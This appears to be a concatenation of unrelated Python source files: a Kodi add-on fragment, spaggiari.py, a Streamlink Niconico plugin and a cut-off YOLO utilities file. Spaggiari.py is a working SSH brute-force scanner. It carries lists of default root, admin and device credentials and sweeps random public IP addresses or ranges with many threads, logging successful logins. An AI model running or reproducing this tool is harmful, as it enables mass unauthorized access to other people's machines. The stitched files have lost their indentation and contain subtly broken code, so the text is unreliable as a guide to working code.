if m == "movies": library[m]["id"].append(i["movieid"])
elif m == "tvshows": library[m]["id"].append(i["tvshowid"])
library[m]["imdb"].append(i["imdbnumber"])
library[m]["otitle"].append(i["originaltitle"].lower())
library[m]["title"].append(i["label"].lower())
plugin.log.info("movies_in_lib = {0}".format(library))
dialogs.notify(msg='Done', title='and Done', delay=5000, image=get_icon_path("metalliq"))
@plugin.route('/testingbak')
def testingbak():
movies_id_list = []
movies_imdb_list = []
movies_otitle_list = []
movies_title_list = []
movies_player_list = []
movies_metalliq_list = xbmcvfs.listdir(plugin.get_setting(SETTING_MOVIES_LIBRARY_FOLDER, unicode))[0]
movies_in_lib = RPC.videolibrary.get_movies(properties=["originaltitle", "imdbnumber", "year"])["movies"]
for item in movies_in_lib:
if item["imdbnumber"] not in movies_metalliq_list: movies_player_list.append("na")
else:
player_file = xbmcvfs.File(os.path.join(plugin.get_setting(SETTING_MOVIES_LIBRARY_FOLDER, unicode), item, "player.info"))
content = player_file.read()
movies_player_list.append(content)
player_file.close()
movies_id_list.append(item["movieid"])
movies_id_list.append(item["movieid"])
movies_imdb_list.append(item["imdbnumber"])
movies_otitle_list.append(item["originaltitle"].lower())
movies_title_list.append(item["label"].lower())
tvshows_id_list = []
tvshows_imdb_list = []
tvshows_otitle_list = []
tvshows_title_list = []
tvshows_player_list = []
tvshows_metalliq_list = xbmcvfs.listdir(plugin.get_setting(SETTING_TV_LIBRARY_FOLDER, unicode))[0]
tvshows_in_lib = RPC.videolibrary.get_tvshows(properties=["originaltitle", "imdbnumber", "year"])["tvshows"]
for item in tvshows_in_lib:
if item["imdbnumber"] not in tvshows_metalliq_list: tvshows_player_list.append("na")
else:
player_file = xbmcvfs.File(os.path.join(plugin.get_setting(SETTING_TV_LIBRARY_FOLDER, unicode), item, "player.info"))
content = player_file.read()
movies_player_list.append(content)
player_file.close()
tvshows_id_list.append(item["tvshowid"])
tvshows_imdb_list.append(item["imdbnumber"])
tvshows_otitle_list.append(item["originaltitle"].lower())
tvshows_title_list.append(item["label"].lower())
players_tot = [p.id for p in get_players("movies")]
players_act = [p.id for p in active_players("movies")]
players_dis = []
for i in players_tot:
if i not in players_act: players_dis.append(i)
players_lib = {}
for x in lib_items:
player_file = xbmcvfs.File(os.path.join(lib_folder, x, "player.info"))
content = player_file.read()
player_file.close()
players_lib[x] = content
player_file.close()
plugin.log.info("lib_movies = {0}".format(lib_items))
plugin.log.info("tot_players = {0}".format(players_tot))
plugin.log.info("act_players = {0}".format(players_act))
plugin.log.info("dis_players = {0}".format(players_dis))
plugin.log.info("lib_players = {0}".format(players_lib))
plugin.log.info("tvshows_in_lib = {0}".format(tvshows_in_lib))
plugin.log.info("movies_in_lib = {0}".format(movies_in_lib))
sorted(["[B]{0}[/B]".format(p.clean_title) for p in players if p.id in plugin.get_setting(SETTING_MOVIES_ENABLED_PLAYERS, unicode)])
sorted(["[I]{0}[/I]".format(p.clean_title) for p in players if p.id not in plugin.get_setting(SETTING_MOVIES_ENABLED_PLAYERS, unicode)])
dialogs.notify(msg='Done', title='and Done', delay=5000, image=get_icon_path("metalliq"))
@plugin.route('/settings')
def settings_general():
openSettings(addonid, 0.0)
@plugin.route('/settings/movies')
def settings_movies():
openSettings(addonid, 1.2)
@plugin.route('/settings/tv')
def settings_tv():
openSettings(addonid, 2.2)
@plugin.route('/settings/music')
def settings_music():
openSettings(addonid, 3.3)
@plugin.route('/settings/live')
def settings_live():
openSettings(addonid, 4.2)
@plugin.route('/settings/advanced/')
def settings_advanced():
openSettings(addonid, 5.0)
@plugin.route('/settings/toggling/')
def settings_toggling():
openSettings(addonid, 5.3)
@plugin.route('/settings/appearance/')
def settings_appearance():
openSettings(addonid, 6.0)
@plugin.route('/.*extrafanart/')
def extra_fanart():
return
@plugin.route('/.*extrathumbs/')
def extra_thumbs():
return
@plugin.route('/.*nomedia')
def mo_media():
return
def openSettings(addonid, focus=None):
try:
xbmc.executebuiltin('Addon.OpenSettings(%s)' % addonid)
value1, value2 = str(focus).split('.')
xbmc.executebuiltin('SetFocus(%d)' % (int(value1) + 100))
xbmc.executebuiltin('SetFocus(%d)' % (int(value2) + 200))
except: return
def clickSettings(addonid, focus=None):
try:
xbmc.executebuiltin('Addon.OpenSettings(%s)' % addonid)
value1, value2 = str(focus).split('.')
xbmc.executebuiltin('SetFocus(%d)' % (int(value1) + 100))
xbmc.executebuiltin('SetFocus(%d)' % (int(value2) + 200))
xbmc.executebuiltin('SendClick(%d)' % (int(value2) + 200))
except: return
######### Main #########
def main():
if '/movies' in sys.argv[0]:
xbmcplugin.setContent(int(sys.argv[1]), 'movies')
elif '/tv/play' in sys.argv[0]:
xbmcplugin.setContent(int(sys.argv[1]), 'episodes')
elif '/tvdb' in sys.argv[0] and sys.argv[0].count('/') < 6:
xbmcplugin.setContent(int(sys.argv[1]), 'seasons')
elif '/tvdb' in sys.argv[0] and sys.argv[0].count('/') > 5:
xbmcplugin.setContent(int(sys.argv[1]), 'episodes')
elif '/tv' in sys.argv[0] and not '/settings' in sys.argv[0]:
xbmcplugin.setContent(int(sys.argv[1]), 'tvshows')
elif '/music' in sys.argv[0]:
xbmcplugin.setContent(int(sys.argv[1]), 'musicvideos')
elif '/live' in sys.argv[0]:
xbmcplugin.setContent(int(sys.argv[1]), 'LiveTV')
elif '/list' in sys.argv[0]:
xbmcplugin.setContent(int(sys.argv[1]), 'videos')
plugin.run()
if __name__ == '__main__':
main()
|
spaggiari.py
|
#!/usr/bin/env python
# Spaggiari Scanner - Developed by acidvegas in Python (https://acid.vegas/spaggiari)
import argparse
import logging
import os
import random
import re
import socket
import sys
import threading
import time
from collections import OrderedDict
# Throttle Settings
max_threads = 100
throttle = 20
timeout_breaker = 5
timeout_port = 10
timeout_ssh = 10
# SSH Login Combos
combos = OrderedDict([
('root', ('root','toor','admin','changeme','pass','password','1234','12345','123456')),
('admin', ('1234','12345','123456','4321','9999','abc123','admin','changeme','admin123','password'))
])
deep_combos = OrderedDict([
('root', ('alien','alpine','calvin','kn1TG7psLu','logapp','openelec','pixmet2003','raspberrypi','rasplex','rootme','soho','TANDBERG','trendimsa1.0')),
('admin', ('aerohive','kn1TG7psLu','TANDBERG')),
('alien', 'alien'),
('bitnami', 'bitnami'),
('cisco', 'cisco'),
('device', 'apc'),
('dpn', 'changeme'),
('HPSupport', 'badg3r5'),
('lp', 'lp'),
('master', 'themaster01'),
('osmc', 'osmc'),
('pi', 'raspberry'),
('plexuser', 'rasplex'),
('sysadmin', 'PASS'),
('toor', 'logapp'),
('ubnt', 'ubnt'),
('user', ('acme','live')),
('vagrant', 'vagrant'),
('virl', 'VIRL'),
('vyos', 'vyos')
])
# Excluded IP Ranges
reserved = ('0','10','100.64','100.65','100.66','100.67','100.68','100.69','100.70','100.71','100.72','100.73','100.74','100.75','100.76','100.77','100.78','100.79','100.80','100.81','100.82','100.83','100.84','100.85','100.86','100.87','100.88','100.89','100.90','100.91','100.92','100.93','100.94','100.95','100.96','100.97','100.98','100.99','100.100','100.101','100.102','100.103','100.104','100.105','100.106','100.107','100.108','100.109','100.110','100.111','100.112','100.113','100.114','100.115','100.116','100.117','100.118','100.119','100.120','100.121','100.122','100.123','100.124','100.125','100.126','100.127','127','169.254','172.16','172.17','172.18','172.19','172.20','172.21','172.22','172.23','172.24','172.25','172.26','172.27','172.28','172.29','172.30','172.31','172.32','192.0.0','192.0.2','192.88.99','192.168','198.18','198.19','198.51.100','203.0.113','224','225','226','227','228','229','230','231','232','233','234','235','236','237','238','239','240','241','242','243','244','245','246','247','248','249','250','251','252','253','254','255')
def check_ip(ip):
return re.match('^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$', ip)
def check_port(ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout_port)
try:
code = sock.connect((ip, port))
except socket.error:
return False
else:
if not code:
return True
else:
return False
finally:
sock.close()
def check_range(targets):
found = False
for ip in targets:
if found:
break
for bad_range in reserved:
if ip.startswith(bad_range + '.'):
found = True
break
return found
def ip_range(start_ip, end_ip):
start = list(map(int, start_ip.split('.')))
end = list(map(int, end_ip.split('.')))
temp = start
ip_range = []
ip_range.append(start_ip)
while temp != end:
start[3] += 1
for i in (3, 2, 1):
if temp[i] == 256:
temp[i] = 0
temp[i-1] += 1
ip_range.append('.'.join(map(str, temp)))
random.shuffle(ip_range)
return ip_range
def random_int(min, max):
return random.randint(min, max)
def random_ip():
return '{0}.{1}.{2}.{3}'.format(random_int(1,223), random_int(0,255), random_int(0,255), random_int(0,255))
def random_scan():
while True:
ip = (random_ip(),)
if not check_range(ip):
threading.Thread(target=ssh_bruteforce, args=(ip[0],)).start()
while threading.activeCount() >= max_threads:
time.sleep(1)
def range_scan(ip_range):
for ip in ip_range:
threading.Thread(target=ssh_bruteforce, args=(ip,)).start()
while threading.activeCount() >= max_threads:
time.sleep(1)
while threading.activeCount() >= 2:
time.sleep(1)
def ssh_bruteforce(ip):
timeouts = 0
if check_port(ip, 22):
logging.debug('{0} has port 22 open.'.format(ip))
for username in combos:
passwords = combos[username]
for password in combos[username]:
if timeouts >= timeout_breaker:
break
else:
result = ssh_connect(ip, username, password)
if result == 1:
timeouts += 1
elif result == 2:
timeouts = timeout_breaker
time.sleep(throttle)
else:
logging.error('{0} does not have port 22 open.'.format(ip))
def ssh_connect(hostname, username, password):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(hostname, 22, username, password, timeout=timeout_ssh)
except socket.timeout:
logging.error('Failed to connect to {0} using {1}:{2} (Timeout)'.format(hostname, username, password))
return 1
except Exception as ex:
logging.error('Failed to connect to {0} using {1}:{2} ({3})'.format(hostname, username, password, str(ex)))
return 0
else:
logging.info('Successful connection to {0} using {1}:{2}'.format(hostname, username, password))
return 2
finally:
ssh.close()
# Main
print(''.rjust(56, '#'))
print('#{0}#'.format(''.center(54)))
print('#{0}#'.format('Spaggiari Scanner'.center(54)))
print('#{0}#'.format('Developed by acidvegas in Python'.center(54)))
print('#{0}#'.format('https://git.supernets.org/acidvegas/spaggiari'.center(54)))
print('#{0}#'.format(''.center(54)))
logger = logging.getLogger()
logger.setLevel(logging.INFO)
stream_handler = logging.StreamHandler(sys.stdout)
stream_handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s | %(levelname)8s: %(message)s', '%I:%M:%S')
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
if not sys.version_info.major == 3:
logging.critical('Spaggiari Scanner requires Python version 3 to run!')
sys.exit()
try:
import paramiko
except ImportError:
logging.critical('Failed to import the Paramiko library!')
sys.exit()
else:
paramiko.util.log_to_file(os.devnull)
parser = argparse.ArgumentParser(prog='spaggiari.py', usage='%(prog)s [OPTIONS] [SCAN]')
parser.add_argument('-d', action='store_true', dest='deepscan', help='option: enable deep scanning.')
parser.add_argument('-f', action='store_true', dest='fastscan', help='option: enable fast scanning.')
parser.add_argument('-o', dest='output', help='option: save output from scan(s) to file.', metavar='<path>', type=str)
parser.add_argument('-l', dest='listscan', help='scan a list of ip addresses from file.', metavar='<path>', type=str)
parser.add_argument('-x', action='store_true', dest='randscan', help='scan random ip addresses. (does not stop)')
parser.add_argument('-r', dest='rangescan', help='scan a range of ip addresses.', metavar=('<class>', '<range>'), nargs=2, type=str)
parser.add_argument('-t', dest='targetscan', help='scan a target ip address.', metavar='<ip>', type=str)
args = parser.parse_args()
if args.deepscan:
if not args.targetscan:
logging.critical('Deep scanning can only be enabled with a target scan. (-t)')
sys.exit()
elif args.fastscan:
logging.critical('Fast scanning can not be enabled with a deep scan. (-f)')
sys.exit()
else:
combos = combos + deep_combos
elif args.fastscan:
if args.targetscan:
logging.critical('Fast scanning can not be enabled with a target scan.')
combos = {'root':('root',) }
if args.output:
file_handler = logging.FileHandler(args.output)
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
logger.debug('Logging enabled.')
if args.listscan:
if os.path.isfile(args.listscan):
targets = []
with open(args.listscan) as list_file:
lines = list_file.read().splitlines()
for line in [x for x in lines if x]:
if check_ip(line):
targets.append(line)
if targets:
if not check_range(targets):
logging.debug('Scanning {0:,} IP addresses from list...'.format(len(targets)))
range_scan(targets)
logging.debug('Scan has completed.')
else:
logging.error('Reserved IP address in range.')
else:
logging.error('List contains no valid IP addresses.')
else:
logging.error('Invalid list file. ({0})'.format(args.listscan))
elif args.randscan:
logging.debug('Scanning random IP addresses...')
random_scan()
elif args.rangescan:
if args.rangescan[0] in ('b','c'):
if args.rangescan[0] == 'b':
if args.iprange == 'random':
range_prefix = '{0}.{1}'.format(random_int(0,255), random_int(0,255))
else:
range_prefix = args.rangescan[1]
start = range_prefix + '.0.0'
end = range_prefix + '.255.255'
elif args.rangescan[0] == 'c':
if args.iprange == 'random':
range_prefix = '{0}.{1}.{2}'.format(random_int(0,255), random_int(0,255), random_int(0,255))
else:
range_prefix = args.rangescan[1]
start = range_prefix + '.0'
end = range_prefix + '.255'
if check_ip(start):
targets = ip_range(start, end)
if not check_range(targets):
logging.debug('Scanning {0} IP addresses in range...'.format(len(targets)))
range_scan(targets)
logging.debug('Scan has completed.')
else:
logging.error('Reserved IP address in range.')
else:
logging.error('Invalid IP range prefix. ({0})'.format(args.rangescan[1]))
else:
logging.error('Invalid IP Class. ({0})'.format(args.rangescan[0]))
elif args.targetscan:
if check_ip(args.targetscan):
ssh_bruteforce(args.targetscan)
logging.debug('Scan has completed.')
else:
logging.error('Invalid IP Address. ({0})'.format(args.targetscan))
else:
parser.print_help()
|
nicolive.py
|
import json
import logging
import re
import threading
import time
from urllib.parse import unquote_plus, urlparse
import websocket
from streamlink import logger
from streamlink.plugin import Plugin, PluginArgument, PluginArguments, pluginmatcher
from streamlink.plugin.api import useragents
from streamlink.stream.hls import HLSStream
from streamlink.utils.times import hours_minutes_seconds
from streamlink.utils.url import update_qsd
_log = logging.getLogger(__name__)
_login_url = "https://account.nicovideo.jp/login/redirector"
_login_url_params = {
"show_button_twitter": 1,
"show_button_facebook": 1,
"next_url": "/"}
@pluginmatcher(re.compile(
r"https?://(?P<domain>live\d*\.nicovideo\.jp)/watch/(lv|co)\d*"
))
class NicoLive(Plugin):
arguments = PluginArguments(
PluginArgument(
"email",
argument_name="niconico-email",
sensitive=True,
metavar="EMAIL",
help="The email or phone number associated with your "
"Niconico account"),
PluginArgument(
"password",
argument_name="niconico-password",
sensitive=True,
metavar="PASSWORD",
help="The password of your Niconico account"),
PluginArgument(
"user-session",
argument_name="niconico-user-session",
sensitive=True,
metavar="VALUE",
help="Value of the user-session token \n(can be used in "
"case you do not want to put your password here)"),
PluginArgument(
"purge-credentials",
argument_name="niconico-purge-credentials",
action="store_true",
help="""
Purge cached Niconico credentials to initiate a new session
and reauthenticate.
"""),
PluginArgument(
"timeshift-offset",
type=hours_minutes_seconds,
argument_name="niconico-timeshift-offset",
metavar="[HH:]MM:SS",
default=None,
help="Amount of time to skip from the beginning of a stream. "
"Default is 00:00:00."))
is_stream_ready = False
is_stream_ended = False
watching_interval = 30
watching_interval_worker_thread = None
stream_reader = None
_ws = None
frontend_id = None
def _get_streams(self):
if self.options.get("purge_credentials"):
self.clear_cookies()
_log.info("All credentials were successfully removed")
self.url = self.url.split("?")[0]
self.session.http.headers.update({
"User-Agent": useragents.CHROME,
})
self.niconico_web_login()
if not self.get_wss_api_url():
_log.error(
"Failed to get wss_api_url. "
"Please check if the URL is correct, "
"and make sure your account has access to the video.")
return None
self.api_connect(self.wss_api_url)
i = 0
while not self.is_stream_ready:
if i % 10 == 0:
_log.debug("Waiting for permit...")
if i == 600:
_log.error("Waiting for permit timed out.")
return None
if self.is_stream_ended:
return None
time.sleep(0.1)
i += 1
streams = HLSStream.parse_variant_playlist(
self.session, self.hls_stream_url)
nico_streams = {}
for s in streams:
nico_stream = NicoHLSStream(streams[s], self)
nico_streams[s] = nico_stream
return nico_streams
def get_wss_api_url(self):
_log.debug("Getting video page: {0}".format(self.url))
resp = self.session.http.get(self.url)
try:
self.wss_api_url = extract_text(
resp.text, ""webSocketUrl":"", """)
if not self.wss_api_url:
return False
except Exception as e:
_log.debug(e)
_log.debug("Failed to extract wss api url")
return False
try:
self.frontend_id = extract_text(
resp.text, ""frontendId":", ","")
except Exception as e:
_log.debug(e)
_log.warning("Failed to extract frontend id")
self.wss_api_url = "{0}&frontend_id={1}".format(self.wss_api_url, self.frontend_id)
_log.debug("Video page response code: {0}".format(resp.status_code))
_log.trace("Video page response body: {0}".format(resp.text))
_log.debug("Got wss_api_url: {0}".format(self.wss_api_url))
_log.debug("Got frontend_id: {0}".format(self.frontend_id))
return self.wss_api_url.startswith("wss://")
def api_on_open(self):
self.send_playerversion()
require_new_stream = not self.is_stream_ready
self.send_getpermit(require_new_stream=require_new_stream)
def api_on_error(self, ws, error=None):
if error:
_log.warning(error)
_log.warning("wss api disconnected.")
_log.warning("Attempting to reconnect in 5 secs...")
time.sleep(5)
self.api_connect(self.wss_api_url)
def api_connect(self, url):
# Proxy support adapted from the UStreamTV plugin (ustreamtv.py)
proxy_url = self.session.get_option("https-proxy")
if proxy_url is None:
proxy_url = self.session.get_option("http-proxy")
proxy_options = parse_proxy_url(proxy_url)
if proxy_options.get('http_proxy_host'):
_log.debug("Using proxy ({0}://{1}:{2})".format(
proxy_options.get('proxy_type') or "http",
proxy_options.get('http_proxy_host'),
proxy_options.get('http_proxy_port') or 80))
_log.debug("Connecting: {0}".format(url))
if logger.root.level <= logger.TRACE:
websocket.enableTrace(True, _log)
def on_error(wssapp, error):
return self.api_on_error(wssapp, error)
def on_message(wssapp, message):
return self.handle_api_message(message)
def on_open(wssapp):
return self.api_on_open()
self._ws = websocket.WebSocketApp(
url,
header=["User-Agent: {0}".format(useragents.CHROME)],
on_open=on_open,
on_message=on_message,
on_error=on_error)
self.ws_worker_thread = threading.Thread(
target=self._ws.run_forever,
kwargs=proxy_options)
self.ws_worker_thread.daemon = True
self.ws_worker_thread.start()
def send_message(self, type_, body):
msg = {"type": type_, "body": body}
msg_json = json.dumps(msg)
_log.debug(f"Sending: {msg_json}")
if self._ws and self._ws.sock.connected:
self._ws.send(msg_json)
else:
_log.warning("wss api is not connected.")
def send_no_body_message(self, type_):
msg = {"type": type_}
msg_json = json.dumps(msg)
_log.debug(f"Sending: {msg_json}")
if self._ws and self._ws.sock.connected:
self._ws.send(msg_json)
else:
_log.warning("wss api is not connected.")
def send_custom_message(self, msg):
msg_json = json.dumps(msg)
_log.debug(f"Sending: {msg_json}")
if self._ws and self._ws.sock.connected:
self._ws.send(msg_json)
else:
_log.warning("wss api is not connected.")
def send_playerversion(self):
body = {
"type": "startWatching",
"data": {
"stream": {
"quality": "abr",
"protocol": "hls",
"latency": "high",
"chasePlay": False
},
"room": {
"protocol": "webSocket",
"commentable": True
},
"reconnect": False
}
}
self.send_custom_message(body)
def send_getpermit(self, require_new_stream=True):
body = {
"type": "getAkashic",
"data": {
"chasePlay": False
}
}
self.send_custom_message(body)
def send_watching(self):
body = {
"command": "watching",
"params": [self.broadcast_id, "-1", "0"]
}
self.send_message("watch", body)
def send_pong(self):
self.send_no_body_message("pong")
self.send_no_body_message("keepSeat")
def handle_api_message(self, message):
_log.debug(f"Received: {message}")
message_parsed = json.loads(message)
if message_parsed["type"] == "stream":
data = message_parsed["data"]
self.hls_stream_url = data["uri"]
# load in the offset for timeshift live videos
offset = self.get_option("timeshift-offset")
if offset and 'timeshift' in self.wss_api_url:
self.hls_stream_url = update_qsd(self.hls_stream_url, {"start": offset})
self.is_stream_ready = True
if message_parsed["type"] == "watch":
body = message_parsed["body"]
command = body["command"]
if command == "currentstream":
current_stream = body["currentStream"]
self.hls_stream_url = current_stream["uri"]
self.is_stream_ready = True
elif command == "watchinginterval":
self.watching_interval = int(body["params"][0])
_log.debug("Got watching_interval: {0}".format(
self.watching_interval))
if self.watching_interval_worker_thread is None:
_log.debug("send_watching_scheduler starting.")
self.watching_interval_worker_thread = threading.Thread(
target=self.send_watching_scheduler)
self.watching_interval_worker_thread.daemon = True
self.watching_interval_worker_thread.start()
else:
_log.debug("send_watching_scheduler already running.")
elif command == "disconnect":
_log.info("Websocket API closed.")
_log.info("Stream ended.")
self.is_stream_ended = True
if self.stream_reader is not None:
self.stream_reader.close()
_log.info("Stream reader closed.")
elif message_parsed["type"] == "ping":
self.send_pong()
def send_watching_scheduler(self):
"""
Periodically send "watching" command to the API.
This is necessary to keep the session alive.
"""
while not self.is_stream_ended:
self.send_watching()
time.sleep(self.watching_interval)
def niconico_web_login(self):
user_session = self.get_option("user-session")
email = self.get_option("email")
password = self.get_option("password")
if user_session is not None:
_log.info("User session cookie is provided. Using it.")
self.session.http.cookies.set(
"user_session",
user_session,
path="/",
domain="nicovideo.jp")
self.save_cookies()
return True
elif self.session.http.cookies.get("user_session"):
_log.info("cached session cookie is provided. Using it.")
return True
elif email is not None and password is not None:
_log.info("Email and password are provided. Attemping login.")
payload = {"mail_tel": email, "password": password}
resp = self.session.http.post(_login_url, data=payload,
params=_login_url_params)
_log.debug("Login response code: {0}".format(resp.status_code))
_log.trace("Login response body: {0}".format(resp.text))
_log.debug("Cookies: {0}".format(
self.session.http.cookies.get_dict()))
if self.session.http.cookies.get("user_session") is None:
try:
msg = extract_text(
resp.text, '<p class="notice__text">', "</p>")
except Exception as e:
_log.debug(e)
msg = "unknown reason"
_log.warning("Login failed. {0}".format(msg))
return False
else:
_log.info("Logged in.")
self.save_cookies()
return True
else:
return False
class NicoHLSStream(HLSStream):
def __init__(self, hls_stream, nicolive_plugin):
super().__init__(
hls_stream.session,
force_restart=hls_stream.force_restart,
start_offset=hls_stream.start_offset,
duration=hls_stream.duration,
**hls_stream.args)
# url is already in hls_stream.args
self.nicolive_plugin = nicolive_plugin
def open(self):
reader = super().open()
self.nicolive_plugin.stream_reader = reader
return reader
def extract_text(text, left, right):
"""Extract text from HTML"""
result = re.findall("{0}(.*?){1}".format(left, right), text)
if len(result) != 1:
raise Exception("Failed to extract string. "
"Expected 1, found {0}".format(len(result)))
return result[0]
def parse_proxy_url(purl):
"""Adapted from UStreamTV plugin (ustreamtv.py)"""
proxy_options = {}
if purl:
p = urlparse(purl)
proxy_options['proxy_type'] = p.scheme
proxy_options['http_proxy_host'] = p.hostname
if p.port:
proxy_options['http_proxy_port'] = p.port
if p.username:
proxy_options['http_proxy_auth'] = \
(unquote_plus(p.username), unquote_plus(p.password or ""))
return proxy_options
__plugin__ = NicoLive
|
utils.py
|
#================================================================
#
# File name : utils.py
# Author : PyLessons
# Created date: 2020-09-27
# Website : https://pylessons.com/
# GitHub : https://github.com/pythonlessons/TensorFlow-2.x-YOLOv3
# Description : additional yolov3 and yolov4 functions
#
#================================================================
from multiprocessing import Process, Queue, Pipe
import cv2
import time
import random
import colorsys
import numpy as np
import json
import tensorflow as tf
from yolov3.configs import *
from yolov3.yolov4 import *
from tensorflow.python.saved_model import tag_constants
def load_yolo_weights(model, weights_file):
tf.keras.backend.clear_session() # used to reset layer names
# load Darknet original weights to TensorFlow model
if YOLO_TYPE == "yolov3":
range1 = 75 if not TRAIN_YOLO_TINY else 13
range2 = [58, 66, 74] if not TRAIN_YOLO_TINY else [9, 12]
if YOLO_TYPE == "yolov4":
range1 = 110 if not TRAIN_YOLO_TINY else 21
range2 = [93, 101, 109] if not TRAIN_YOLO_TINY else [17, 20]
with open(weights_file, 'rb') as wf:
major, minor, revision, seen, _ = np.fromfile(wf, dtype=np.int32, count=5)
j = 0
for i in range(range1):
if i > 0:
conv_layer_name = 'conv2d_%d' %i
else:
conv_layer_name = 'conv2d'
if j > 0:
bn_layer_name = 'batch_normalization_%d' %j
else:
bn_layer_name = 'batch_normalization'
conv_layer = model.get_layer(conv_layer_name)
filters = conv_layer.filters
k_size = conv_layer.kernel_size[0]
in_dim = conv_layer.input_shape[-1]
if i not in range2:
# darknet weights: [beta, gamma, mean, variance]
bn_weights = np.fromfile(wf, dtype=np.float32, count=4 * filters)
# tf weights: [gamma, beta, mean, variance]
bn_weights = bn_weights.reshape((4, filters))[[1, 0, 2, 3]]
bn_layer = model.get_layer(bn_layer_name)
j += 1
else:
conv_bias = np.fromfile(wf, dtype=np.float32, count=filters)
# darknet shape (out_dim, in_dim, height, width)
conv_shape = (filters, in_dim, k_size, k_size)
conv_weights = np.fromfile(wf, dtype=np.float32, count=np.product(conv_shape))
# tf shape (height, width, in_dim, out_dim)
conv_weights = conv_weights.reshape(conv_shape).transpose([2, 3, 1, 0])
if i not in range2:
conv_layer.set_weights([conv_weights])
bn_layer.set_weights(bn_weights)
else:
conv_layer.set_weights([conv_weights, conv_bias])
assert len(wf.read()) == 0, 'failed to read all data'
def Load_Yolo_model():
gpus = tf.config.experimental.list_physical_devices('GPU')
if len(gpus) > 0:
print(f'GPUs {gpus}')
try: tf.config.experimental.set_memory_growth(gpus[0], True)
except RuntimeError: pass
if YOLO_FRAMEWORK == "tf": # TensorFlow detection
if YOLO_TYPE == "yolov4":
Darknet_weights = YOLO_V4_TINY_WEIGHTS if TRAIN_YOLO_TINY else YOLO_V4_WEIGHTS
if YOLO_TYPE == "yolov3":
Darknet_weights = YOLO_V3_TINY_WEIGHTS if TRAIN_YOLO_TINY else YOLO_V3_WEIGHTS
if YOLO_CUSTOM_WEIGHTS == False:
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE, CLASSES=YOLO_COCO_CLASSES)
load_yolo_weights(yolo, Darknet_weights) # use Darknet weights
else:
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE, CLASSES=TRAIN_CLASSES)
yolo.load_weights("checkpoints/yolov3_custom") # use custom weights
elif YOLO_FRAMEWORK == "trt": # TensorRT detection
saved_model_loaded = tf.saved_model.load(YOLO_CUSTOM_WEIGHTS, tags=[tag_constants.SERVING])
signature_keys = list(saved_model_loaded.signatures.keys())
yolo = saved_model_loaded.signatures['serving_default']
return yolo
def image_preprocess(image, target_size, gt_boxes=None):
ih, iw = target_size
h, w, _ = image.shape
scale = min(iw/w, ih/h)
nw, nh = int(scale * w), int(scale * h)
image_resized = cv2.resize(image, (nw, nh))
image_paded = np.full(shape=[ih, iw, 3], fill_value=128.0)
dw, dh = (iw - nw) // 2, (ih-nh) // 2
image_paded[dh:nh+dh, dw:nw+dw, :] = image_resized
image_paded = image_paded / 255.
if gt_boxes is None:
return image_paded
else:
gt_boxes[:, [0, 2]] = gt_boxes[:, [0, 2]] * scale + dw
gt_boxes[:, [1, 3]] = gt_boxes[:, [1, 3]] * scale + dh
return image_paded, gt_boxes
def draw_bbox(image, bboxes, CLASSES=YOLO_COCO_CLASSES, show_label=True, show_confidence = True, Text_colors=(255,255,0), rectangle_colors='', tracking=False):
NUM_CLASS = read_class_names(CLASSES)
num_classes = len(NUM_CLASS)
image_h, image_w, _ = image.shape
hsv_tuples = [(1.0 * x / num_classes, 1., 1.) for x in range(num_classes)]
#print("hsv_tuples", hsv_tuples)
colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
colors = list(map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)), colors))
random.seed(0)
random.shuffle(colors)
random.seed(None)
data = {}
data['components'] = []
for i, bbox in enumerate(bboxes):
coor = np.array(bbox[:4], dtype=np.int32)
coordinates = coor.tolist()
score = bbox[4]
class_ind = int(bbox[5])
bbox_color = rectangle_colors if rectangle_colors != '' else colors[class_ind]
bbox_thick = int(0.6 * (image_h + image_w) / 1000)
if bbox_thick < 1: bbox_thick = 1
fontScale = 0.75 * bbox_thick
(x1, y1), (x2, y2) = (coor[0], coor[1]), (coor[2], coor[3])
# put object rectangle
cv2.rectangle(image, (x1, y1), (x2, y2), bbox_color, bbox_thick*2)
if show_label:
# get text label
score_str = " {:.2f}".format(score) if show_confidence else ""
if tracking: score_str = " "+str(score)
classResult = "{}".format(NUM_CLASS[class_ind])
label = "{}".format(NUM_CLASS[class_ind]) + score_str
# get text size
(text_width, text_height), baseline = cv2.getTextSize(label, cv2.FONT_HERSHEY_COMPLEX_SMALL,
fontScale, thickness=bbox_thick)
# put filled text rectangle
cv2.rectangle(image, (x1, y1), (x1 + text_width, y1 - text_height - baseline), bbox_color, thickness=cv2.FILLED)
# put text above rectangle
cv2.putText(image, label, (x1, y1-4), cv2.FONT_HERSHEY_COMPLEX_SMALL,
fontScale, Text_colors, bbox_thick, lineType=cv2.LINE_AA)
data['components'].append({
'name': classResult,
'score': score_str,
'coordinates': coordinates
})
with open('/home/pi/PiServer/Julio/machine_learning/results.json', 'w') as outfile:
json.dump(data, outfile, indent=4, sort_keys=True)
print("results.json file saved")
return image
def bboxes_iou(boxes1, boxes2):
boxes1 = np.array(boxes1)
boxes2 = np.array(boxes2)
boxes1_area = (boxes1[..., 2] - boxes1[..., 0]) * (boxes1[..., 3] - boxes1[..., 1])
boxes2_area = (boxes2[..., 2] - boxes2[..., 0]) * (boxes2[..., 3] - boxes2[..., 1])
left_up = np.maximum(boxes1[..., :2], boxes2[..., :2])
right_down = np.minimum(boxes1[..., 2:], boxes2[..., 2:])
inter_section = np.maximum(right_down - left_up, 0.0)
inter_area = inter_section[..., 0] * inter_section[..., 1]
union_area = boxes1_area + boxes2_area - inter_area
ious = np.maximum(1.0 * inter_area / union_area, np.finfo(np.float32).eps)
return ious
def nms(bboxes, iou_threshold, sigma=0.3, method='nms'):
"""
:param bboxes: (xmin, ymin, xmax, ymax, score, class)
Note: soft-nms, https://arxiv.org/pdf/1704.04503.pdf
https://github.com/bharatsingh430/soft-nms
"""
classes_in_img = list(set(bboxes[:, 5]))
